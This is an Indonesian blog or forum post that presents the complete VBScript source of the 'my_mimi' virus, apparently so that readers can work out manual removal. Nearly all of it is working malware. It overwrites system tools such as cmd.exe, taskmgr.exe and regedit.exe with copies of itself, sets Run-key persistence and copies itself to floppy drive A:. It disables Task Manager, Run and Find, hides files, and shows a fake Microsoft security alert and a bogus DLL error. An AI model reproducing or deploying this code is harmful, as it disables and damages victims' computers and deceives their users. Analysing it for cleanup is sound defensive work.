Source Code virus love_mimi

Nampaknya saya gak sempat dan tidak akan sempat membuat analisis virus bandel yang satu ini. tapi saya harap dengan memposting source code ini ada diantara teman2 yang mau membuat cara manual removalnya. dengan source code ini anda bisa melihat langsung badan virus dan apa saja yang dilakukannya. sehingga dapat melakukan pembersihan manual.
wassalam
--------------------------------[mulai]-----------------------
Set love = createobject(StrReverse("tcejbOmetsySelif.gnitpircS"))

Set dear = createobject(StrReverse("llehS.tpircSW"))

qi = "c:regedit.vbs"

syau = "c:mymimi.vbs"

heiji = "c:notepad.vbs"

forest = "c:antivirus.vbs"

han = "c:windowssvchost.exe"

tachoor = "c:windowsEXPL0RER.vbs"

mimi = "c:windowssystemWinUpdt.vbs"

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

love.CopyFile wscript.scriptfullname, mimi

on error resume next

iqra = dear.regread("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunKernell32")

If iqra <> "c:windowssvchost.exe " & tachoor then

on error resume next

dear.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows ScriptingHostSettingsTimeout", 0, "REG_DWORD"

dear.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunKernell32", "c:windowssvchost.exe " & tachoor

dear.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunAVGuard32", "c:windowssvchost.exe " & mimi

dear.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunPCMAVscanner", "c:windowssvchost.exe " & syau

done = MsgBox("The application or DLL C:WINDOWSsystem32MSVBVM60.DLL is not a valid Windows image. Please check this againts your installation diskette.", 16, "msvbvm60.dll - Bad Image")

dear.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesSVCH0ST", "c:windowssvchost.exe " & mimi

love.CopyFile wscript.scriptfullname, "A:diary_rahmi.vbe"

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSmsvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvm50.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msihnd.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvnvvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSTASKMAN.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSNOTEPAD.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSR.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSREGEDIT.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSregedit.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32nusrmgr.cpl"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32cmd.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32control.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msiexec.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32regedt32.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32taskman.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32taskmgr.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32command.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32T.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32TASKMGR.com"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32Restorerstrui.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32Restoresrdiag.exe"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32Restoresrframe.mmf"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32Restorerstrlog.dat"

on error resume next

cdrsqnx()

dwozmc()

ontrus()

else

on error resume next

love.CopyFile wscript.scriptfullname, "A:diary_mimi.vbs"

on error resume next

love.CopyFile wscript.scriptfullname, tachoor

on error resume next

love.CopyFile wscript.scriptfullname, "C:Documents and SettingsAll UsersStart MenuProgramsStartupPCMAVExtMonitor.vbs"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvm50.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSmsvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32msvbvnvvm60.dll"

on error resume next

love.CopyFile wscript.scriptfullname, "C:WINDOWSsystem32nusrmgr.cpl"

on error resume next

hcdmshsx()

cdrsqnx()

dwozmc()

ontrus()

End if

Sub hcdmshsx()

Dim married

on error resume next

married = "<html><head><title>bandit corporation</title><b><center><h1><font color=" & chr(34) & "#FF0000" & chr(34) & " size=" & chr(34) & "10" & chr(34) & " face=Verdana><br>my_mimi </font><font size=" & chr(34) & "8" & chr(34) & " color=" & chr(34) & "#FF2244" & chr(34) & ">&hearts; </font><hr align=center width=" & chr(34) & "40%" & chr(34) & " size=" & chr(34) & "2" & chr(34) & "></font></h1></head>" & "<body bgcolor=" & chr(34) & "#000000" & chr(34) & "><body><b><center><font color=" & chr(34) & "#FF0000" & chr(34) & " size=" & chr(34) & "4" & chr(34) & " face=verdana></p><p><p><b><p><b><p><br><p>muka bego!! ngapain mandangin kompie ini trus2an!? cari dong anti virusnya!!<br><br><br><a href=" & chr(34) & "http://friendster.com/sywq" & chr(34) & ">klik di sini!</a></font></p><p></p><p></p><p></p><p><center><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><b><p><b><p><br><p><hr align=center width=" & chr(34) & "100%" & chr(34) & " size=" & chr(34) & "4" & chr(34) & "><marquee><font color=" & chr(34) & "#00FF00" & chr(34) & " size=" & chr(34) & "4" & chr(34) & " face=Verdana></font><font size=" & chr(34) & "4" & chr(34) & " color=" & chr(34) & "#FF0000" & chr(34) & ">&clubs; &spades; &diams; &hearts; </font><font color=" & chr(34) & "#FFFFFF" & chr(34) & " size=" & chr(34) & "4" & chr(34) & "face=Verdana> Pada komputer ini bersarang virus my_mimi</font><font size=" & chr(34) & "4" & chr(34) & " color=" & chr(34) & "#FF0000" & chr(34) & "> &clubs; &spades; &diams; &hearts; </font><font color=" & chr(34) & "#FFFFFF" & chr(34) & " size=" & chr(34) & "4" & chr(34) & "face=Verdana> Komputer iko kanai virus my_mimi</font><font size=" & chr(34) & "4" & chr(34) & " color=" & chr(34) & "#FF0000" & chr(34) & "> &clubs; &spades; &diams; &hearts; </font><font color=" & chr(34) & "#FFFFFF" & chr(34) & " size=" & chr(34) & "4" & chr(34) & "face=Verdana> This computer is a victim of virus my_mimi</font><font size=" & chr(34) & "4" & chr(34) & " color=" & chr(34) & "#FF0000" & chr(34) & "> &clubs; &spades; &diams; &hearts; </font><font color=" & chr(34) & "#00FF00" & chr(34) & " size=" & chr(34) & "4" & chr(34) & " face=Verdana>with love, mr.han</font></marquee><hr align=center width=" & chr(34) & "100%" & chr(34) & " size=" & chr(34) & "4" & chr(34) & "></center></html>"

Set hateness = love.createtextfile("C:windowsmy_mimi.html",1)

hateness.Write married

Set hateness = love.createtextfile("C:Documents and SettingsAll UsersDesktopmimi on internet.html",1)

hateness.Write married

hateness.Close

on error resume next

Set broken = love.createtextfile("C:Documents and SettingsAll UsersStart MenuProgramsStartupsywq.ini", 1)

broken.WriteLine "::::::,.....:;.,,,,,..,...,,,::,,,,:::::::::;:;;;;;;;rrrrrr;;;;;;r@@@AS2AMHG3hrsy@" & vbCrlf & ":,....,,.....;,,.. ... ..:,,:::::::::::;;;;;;;;rrrrsr;;;;;;;:s@@@92322@@@;wQ@" & vbCrlf & "..,,,,,,,,,..,, .;r3HAH@@@G5:....,:::::::;;;s;;;;;;rrrrrssrr;;;r;;,X@X5XXXHMB@3201" & vbCrlf & ",,,,,,,,,,,. .i&@@@@@@@@@@@@@@9Sr,.;::::;;;:s;;;;;rrrr;;:;;;;;:;;;::G22X3H@2sAMB3," & vbCrlf & ",,,,,,,,,,. r@@@@@@@@@@@@###@@@@@#Sr;::;;;;:rr;rrs;;::::::,,:rGB2r:,r23&B@M2r#@@@h" & vbCrlf & ",,,,,,,,,..&@@@@@@@@@@#AX5525S5h@@@5::;;;;;;rr;;;:::::,,.:sG@@@@@@HSs2XA##A9rB@@@B" & vbCrlf & ",,,,,,,,.:@@@@@###AAA95iSS522XB@M5SA;:;rrr;;;::::,,,..:iA@@@@@@@@@@@ASX3HHA&r3&G&H" & vbCrlf & ",,,,,,,.:@@@@@##Mh225XGM##H&GSX##AS5s:;rr;:::,,,...:5M@@@@@@####@@@@@323AAHAr2HA&&" & vbCrlf & ",,,,,,,.A@@@####B35XH#####MA92i2#@@Br,..,::::,.,;X#@@@@@##MMMMMM####@@AhhhBAsX#BBA" & vbCrlf & ",,,,,,.5@@##M##@#92&AhhH#@#A922sr5srSs;...,,:;H@@@@@@#MBBBBBMMMBHHB##3s2AGMHi5&HMA" & vbCrlf & ",,,,,,;@@#MBM##@@XiX9B#@@BA9X253HBB@#2s;.....,rh@@@@##MMMMMMBBHHAA2: rHMHi2GXGA" & vbCrlf & ";,,,,.s@@#MM###@#5s2AAX5552XhGX@@@BAXSir;.... ;h@@@###MBBHH&hS, A#B59B3X3" & vbCrlf & ";:,:, s@@MB#####hsiSissiS2223&AAh3X&&X93S; ... ,2#@#MBBHG3Xii.,, H@B2G#A&h" & vbCrlf & ":;::,..M@MBB##@HSrsssiS222XX32222&####MH&X...... .iB@#h2Sii53X:r: M@BX&#HAG" & vbCrlf & "::;::, ;@#MMM#@#2rsSiS222XXX3X9A#@HAHM@#G&; .,,.... rGA35522X&X:r: ##B&HBBH&" & vbCrlf & "::;;:,. S@#MM#@@H5iSSS522XX339&MMGhB##@@M&;,:..,,.... ;hMAX52XAX:r; ##B&HAHBA" & vbCrlf & ":::;:::. 2B93AMMH&255SS2XX3939G&G&BMBH&hX2,.;;:......... :XMHX2XA9;;,,##BHMHAMA" & vbCrlf & ":;;;;::. s#5XGHX2iS55552X9hhG&ABBHA&&ABBB; .,:;,...,,,... .iBM&XGAr,r##BMAsHMH" & vbCrlf & "rr;::,,,. XAA#AGGSsS222X39G&&AAA&hh&B##@@: ...,:;,..,,,,,... rA#H&X,;##B#& rMA" & vbCrlf & "::,,,,,,,. ,shA5235sS22X3h&AAAAA&&HM#@@@9 .....,:;,..,,,,.,. :9##Xi##B#@r.2G" & vbCrlf & ":::,,,,,,.. :X@@3rri2X339G&AHM##@@@@@#Xr .....,,::,..,,..... ,5MAM#M#@@@@&" & vbCrlf & ":,,,,,,,,... ;B@M2s29GAAHM#@@@@@@###MHHi .......,::,......... r##M@@#@@@" & vbCrlf & ",,,,,,,,...... ,iSS9&AAAAAHHHHHA&GGGAAMs ..::, ...... .:3MMB#@#BHM" & vbCrlf & ",,,,,,.......... ,29999939h&AA&&AB#@@@@3:,.. .,. .. ,@@@#BB#@@AAH" & vbCrlf & ",,,,,,,...,....... s23GAB##########@@@@@@@@@@@@BhSr:,,. ,M@@@@@@#B#@@HGA" & vbCrlf & ",,,,,,,,,.,,.. ,:;&##@@###MMMM#MMBBM###@@@@@@@@@@@@@@@@H2H@@@@@@@@@@#@@#GA" & vbCrlf & ",,,,,,,,,,. ,;rsiSh#@@@@@@#####MMM#######MBHAH#@#BMMB25hBM#@@@@@@@@#@@@@@@@@@@AA" & vbCrlf & ",,,,,,,.. :X@@@@@@@@@@@@@@####MMMM#######MMMMB&M@@@###HX3XX995hHAAA&&#@@@@@@@@@MA" & vbCrlf & ",,,,,,,. ;B@@@@@@@@@@@##M##########MH&923&BHH#@HHM#@@@MB##952A3X&Hi2hB#@@@@#@@@@@B" & vbCrlf & ",,,,,,,.9@@@@#@@##@@@@#MM########@@MB##MBM#@@@@@#h2SA#@#H;sX33&hXAX392&AM#A2B@@@@@" & vbCrlf & ",,,,,,.2@@BM#MM#@##@@@@#B#@@@@@@@@@@@@@@@@@@@@@@@##@#@@@@ASG9h&Xh9hSA23X32S3&#@@@@" & vbCrlf & ",,,,,.:@@AB##M####@@@@@@#M#@@@@@#@@@@@@@@@@@@@@@@@#@@@@@@@@@2i5iX5s2G355X2GG2iG@@#" & vbCrlf & ",,,,,.&@BMBBM#M#@#@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@##@@@@@@@@@@@B#MA9G#M##MBA#MX2#@" & vbCrlf & "::,,.;@#M#HH###M#@@@@@@@@@##@@@##@@#@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@BM@" & vbCrlf & ".... ;BHHBHHMM##M##@@@@@@@@######@@@@@@@@@############@@@@@@@@@###################" & vbCrlf & "" & vbCrlf & "mimi..." & vbCrlf & "lo emang my_mimi!!" & vbCrlf & "" & vbCrlf & "however you are,," & vbCrlf & "IjustWANNAbeWITHu.." & vbCrlf & " " & vbCrlf & "[credits]" & vbCrlf & " " & vbCrlf & "mr.han (d_janer'z crew!)" & vbCrlf & "haecal (d_janer'z crew!)" & vbCrlf & "rendi (d_janer'z crew!)" & vbCrlf & "siwa (d_janer'z crew!)"& vbCrlf & "kharisma (phatigokil)" & vbCrlf & "all d_janer'z crew!!! smansa padang"

Set broken = love.createtextfile("C:Documents and SettingsAll UsersDesktopmy beLoved mimi.ini", 1)

broken.WriteLine "::::::,.....:;.,,,,,..,...,,,::,,,,:::::::::;:;;;;;;;rrrrrr;;;;;;r@@@AS2AMHG3hrsy@" & vbCrlf & ":,....,,.....;,,.. ... ..:,,:::::::::::;;;;;;;;rrrrsr;;;;;;;:s@@@92322@@@;wQ@" & vbCrlf & "..,,,,,,,,,..,, .;r3HAH@@@G5:....,:::::::;;;s;;;;;;rrrrrssrr;;;r;;,X@X5XXXHMB@3201" & vbCrlf & ",,,,,,,,,,,. .i&@@@@@@@@@@@@@@9Sr,.;::::;;;:s;;;;;rrrr;;:;;;;;:;;;::G22X3H@2sAMB3," & vbCrlf & ",,,,,,,,,,. r@@@@@@@@@@@@###@@@@@#Sr;::;;;;:rr;rrs;;::::::,,:rGB2r:,r23&B@M2r#@@@h" & vbCrlf & ",,,,,,,,,..&@@@@@@@@@@#AX5525S5h@@@5::;;;;;;rr;;;:::::,,.:sG@@@@@@HSs2XA##A9rB@@@B" & vbCrlf & ",,,,,,,,.:@@@@@###AAA95iSS522XB@M5SA;:;rrr;;;::::,,,..:iA@@@@@@@@@@@ASX3HHA&r3&G&H" & vbCrlf & ",,,,,,,.:@@@@@##Mh225XGM##H&GSX##AS5s:;rr;:::,,,...:5M@@@@@@####@@@@@323AAHAr2HA&&" & vbCrlf & ",,,,,,,.A@@@####B35XH#####MA92i2#@@Br,..,::::,.,;X#@@@@@##MMMMMM####@@AhhhBAsX#BBA" & vbCrlf & ",,,,,,.5@@##M##@#92&AhhH#@#A922sr5srSs;...,,:;H@@@@@@#MBBBBBMMMBHHB##3s2AGMHi5&HMA" & vbCrlf & ",,,,,,;@@#MBM##@@XiX9B#@@BA9X253HBB@#2s;.....,rh@@@@##MMMMMMBBHHAA2: rHMHi2GXGA" & vbCrlf & ";,,,,.s@@#MM###@#5s2AAX5552XhGX@@@BAXSir;.... ;h@@@###MBBHH&hS, A#B59B3X3" & vbCrlf & ";:,:, s@@MB#####hsiSissiS2223&AAh3X&&X93S; ... ,2#@#MBBHG3Xii.,, H@B2G#A&h" & vbCrlf & ":;::,..M@MBB##@HSrsssiS222XX32222&####MH&X...... .iB@#h2Sii53X:r: M@BX&#HAG" & vbCrlf & "::;::, ;@#MMM#@#2rsSiS222XXX3X9A#@HAHM@#G&; .,,.... rGA35522X&X:r: ##B&HBBH&" & vbCrlf & "::;;:,. S@#MM#@@H5iSSS522XX339&MMGhB##@@M&;,:..,,.... ;hMAX52XAX:r; ##B&HAHBA" & vbCrlf & ":::;:::. 2B93AMMH&255SS2XX3939G&G&BMBH&hX2,.;;:......... :XMHX2XA9;;,,##BHMHAMA" & vbCrlf & ":;;;;::. s#5XGHX2iS55552X9hhG&ABBHA&&ABBB; .,:;,...,,,... .iBM&XGAr,r##BMAsHMH" & vbCrlf & "rr;::,,,. XAA#AGGSsS222X39G&&AAA&hh&B##@@: ...,:;,..,,,,,... rA#H&X,;##B#& rMA" & vbCrlf & "::,,,,,,,. ,shA5235sS22X3h&AAAAA&&HM#@@@9 .....,:;,..,,,,.,. :9##Xi##B#@r.2G" & vbCrlf & ":::,,,,,,.. :X@@3rri2X339G&AHM##@@@@@#Xr .....,,::,..,,..... ,5MAM#M#@@@@&" & vbCrlf & ":,,,,,,,,... ;B@M2s29GAAHM#@@@@@@###MHHi .......,::,......... r##M@@#@@@" & vbCrlf & ",,,,,,,,...... ,iSS9&AAAAAHHHHHA&GGGAAMs ..::, ...... .:3MMB#@#BHM" & vbCrlf & ",,,,,,.......... ,29999939h&AA&&AB#@@@@3:,.. .,. .. ,@@@#BB#@@AAH" & vbCrlf & ",,,,,,,...,....... s23GAB##########@@@@@@@@@@@@BhSr:,,. ,M@@@@@@#B#@@HGA" & vbCrlf & ",,,,,,,,,.,,.. ,:;&##@@###MMMM#MMBBM###@@@@@@@@@@@@@@@@H2H@@@@@@@@@@#@@#GA" & vbCrlf & ",,,,,,,,,,. ,;rsiSh#@@@@@@#####MMM#######MBHAH#@#BMMB25hBM#@@@@@@@@#@@@@@@@@@@AA" & vbCrlf & ",,,,,,,.. :X@@@@@@@@@@@@@@####MMMM#######MMMMB&M@@@###HX3XX995hHAAA&&#@@@@@@@@@MA" & vbCrlf & ",,,,,,,. ;B@@@@@@@@@@@##M##########MH&923&BHH#@HHM#@@@MB##952A3X&Hi2hB#@@@@#@@@@@B" & vbCrlf & ",,,,,,,.9@@@@#@@##@@@@#MM########@@MB##MBM#@@@@@#h2SA#@#H;sX33&hXAX392&AM#A2B@@@@@" & vbCrlf & ",,,,,,.2@@BM#MM#@##@@@@#B#@@@@@@@@@@@@@@@@@@@@@@@##@#@@@@ASG9h&Xh9hSA23X32S3&#@@@@" & vbCrlf & ",,,,,.:@@AB##M####@@@@@@#M#@@@@@#@@@@@@@@@@@@@@@@@#@@@@@@@@@2i5iX5s2G355X2GG2iG@@#" & vbCrlf & ",,,,,.&@BMBBM#M#@#@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@##@@@@@@@@@@@B#MA9G#M##MBA#MX2#@" & vbCrlf & "::,,.;@#M#HH###M#@@@@@@@@@##@@@##@@#@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@BM@" & vbCrlf & ".... ;BHHBHHMM##M##@@@@@@@@######@@@@@@@@@############@@@@@@@@@###################" & vbCrlf & "" & vbCrlf & "mimi..." & vbCrlf & "lo emang my_mimi!!" & vbCrlf & "" & vbCrlf & "however you are,," & vbCrlf & "IjustWANNAbeWITHu.." & vbCrlf & " " & vbCrlf & "[credits]" & vbCrlf & " " & vbCrlf & "mr.han (d_janer'z crew!)" & vbCrlf & "haecal (d_janer'z crew!)" & vbCrlf & "rendi (d_janer'z crew!)" & vbCrlf & "siwa (d_janer'z crew!)" & vbCrlf & "kharisma (phatigokil)" & vbCrlf & "all d_janer'z crew!!! smansa padang"

Set broken = love.createtextfile(qi, 1)

broken.WriteLine "MsgBox " & chr(34) & "Knp sih kamu buka regedit? Dah bosan ya jadi temen aku? Kamu tega banget!" & chr(34) & ", vbOKonly," & chr(34) & "my_mimi : (" & chr(34)

Set broken = love.createtextfile(heiji, 1)

broken.WriteLine "MsgBox " & chr(34) & "Kamu nyari notepad ya? Dia lagi pergi ma wordpad. Ada pesan?" & chr(34) & ", vbOKonly," & chr(34) & "my_mimi : P" & chr(34)

Set broken = love.createtextfile(forest, 1)

broken.WriteLine "MsgBox " & chr(34) & "Ngapain kamu make antivirus? Kamu pikir aku ini virus yg ngerusak kamu? Klo gitu biar aku cari teman lain aja!" & chr(34) & ", vbOKonly," & chr(34) & "my_mimi : (" & chr(34)

Set broken = love.createtextfile(syau, 1)

broken.WriteLine "MsgBox " & chr(34) & "hy, seneng deyh ketemuwh kamu lagi!" & chr(34) & ", vbOKonly," & chr(34) & "my_mimi ^_~" & chr(34)

broken.Close

End sub

Sub cdrsqnx()

On Error resume next

Set dear = createobject(StrReverse("llehS.tpircSW"))

with dear

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystemlegalnoticetext", "Windows Security Center has been detected a new kind virus on your machine {codename: my_mimi}. This virus can causes your machine MELEDAK GITU LOH! Please tell Microsoft about this or use Microsoft Windows Automatic Update. For further information, contact us at : customercare@microsoft.com "

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystemlegalnoticecaption", "Windows Security Center Alert"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftInternet ExplorerMainStart Page", "C:windowsmy_mimi.html"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerLogon User Name", "mimi"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogonAltDefaultUserName", "mimi"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogonDefaultUserName", "mimi"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopConvertedWallpaper", "C:windowsmy_mimi.html"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreenSaveActive", "1"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopSCRNSAVE.EXE", "C:WINDOWSsystem32marquee.scr"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeAttributes", "00011"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeBackgroundColor", "0 0 0"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeCharSet", "0"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeFont", "Verdana"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeMode", "1"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeSize", "24"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeSpeed", "3"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeText", "my_mimi by mr. han (d_janer'z crew!)"

.RegWrite "HKEY_CURRENT_USERControl PanelDesktopScreen Saver.MarqueeTextColor", "255 0 0"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerSearchHidden", 0, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerSearchSystemDirs", 0, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerThumbnailSize", 100, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedSuperHidden", 1, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden", 0, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemNoFolderOptions", 0, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr", 1, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", 1, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind", 1, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions", 0, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu", 1, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives", 4, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled", 1, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesActiveDesktopNoChangingWallpaper", 1, "REG_DWORD"

.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerSearchHidden", 0, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedSuperHidden", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden", 0, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerSearchSystemDirs", 0, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerThumbnailSize", 100, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesSystemNoFolderOptions", 0, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions", 0, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderControlPanelInMyComputerCheckedValue", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderControlPanelInMyComputerUncheckedValue", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderControlPanelInMyComputerDefaultValue", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHiddenCheckedValue", 0, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHiddenUncheckedValue", 0, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHiddenDefaultValue", 0, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHiddenWarningIfNotDefault", "Ngapain sih main buka-bukaan? Ntar aku bilang mama kamu lho!"

.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHideFileExtCheckedValue", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHideFileExtUncheckedValue", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHideFileExtCheckedValue", 1, "REG_DWORD"

.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHideFileExtWarningIfNotDefault", "Hei! Knapa kamu mo liat rahasia aq? Wlaupun qt tmnan, aq ttp punya rahasia yg g blh kamu tau!"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerStartMenuStartPanelControlPanelHideCheckedValue", "1"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerStartMenuStartPanelControlPanelHideDefaultValue", "1"

.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionSystemFileProtectionShowPopup", 1, "REG_DWORD"

